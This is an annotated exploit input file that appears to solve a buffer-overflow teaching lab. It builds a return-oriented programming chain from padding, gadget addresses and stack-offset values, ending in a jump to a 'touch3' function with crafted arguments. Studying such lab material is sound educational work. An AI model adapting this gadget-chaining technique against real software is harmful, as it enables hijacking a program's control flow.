/* Padding */
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
/* Return address: make it point to function doing pop rsi 402c0f */
0f 2c 40 00 00 00 00 00
/*  value of rsi to be added to rsp in order to point rdi 80 */
50 00 00 00 00 00 00 00
/* Return address: make it point to function doing leaq rsp,rax 402bb2 */
b2 2b 40 00 00 00 00 00
/* Return address: make it point to function doing mov rax rdi 402a7d */
7d 2a 40 00 00 00 00 00
/* Return address: make it point to function doing leaq(rdi,rsi), rax  402b3d */
3d 2b 40 00 00 00 00 00
/* Return address: make it point to function doing mov rax rdi 402a7d */
7d 2a 40 00 00 00 00 00
/* Return address: make it point to function doing pop rsi 402c0f */
0f 2c 40 00 00 00 00 00
/*  value of rsi to be added to rsp in order to point rsi should be -16 */
f0 ff ff ff ff ff ff ff
/* Return address: make it point to function doing leaq(rdi,rsi), rax  402b3d */
3d 2b 40 00 00 00 00 00
/* Return address: make it point to function doing mov rax rsi 402a89 */
89 2a 40 00 00 00 00 00
/* Return address: touch3 */
2f 29 40 00 00 00 00 00
/* Argument2 short array should be 16 bytes */
03 00 0c 00 01 00 0e 00 0f 00 0f 00 04 00 05 00
/* Argument1 char array */
33 63 31 65 66 66 34 35 00